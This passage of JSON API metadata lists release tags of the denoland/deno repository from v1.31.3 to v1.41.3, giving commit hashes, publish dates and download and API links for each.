gs/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste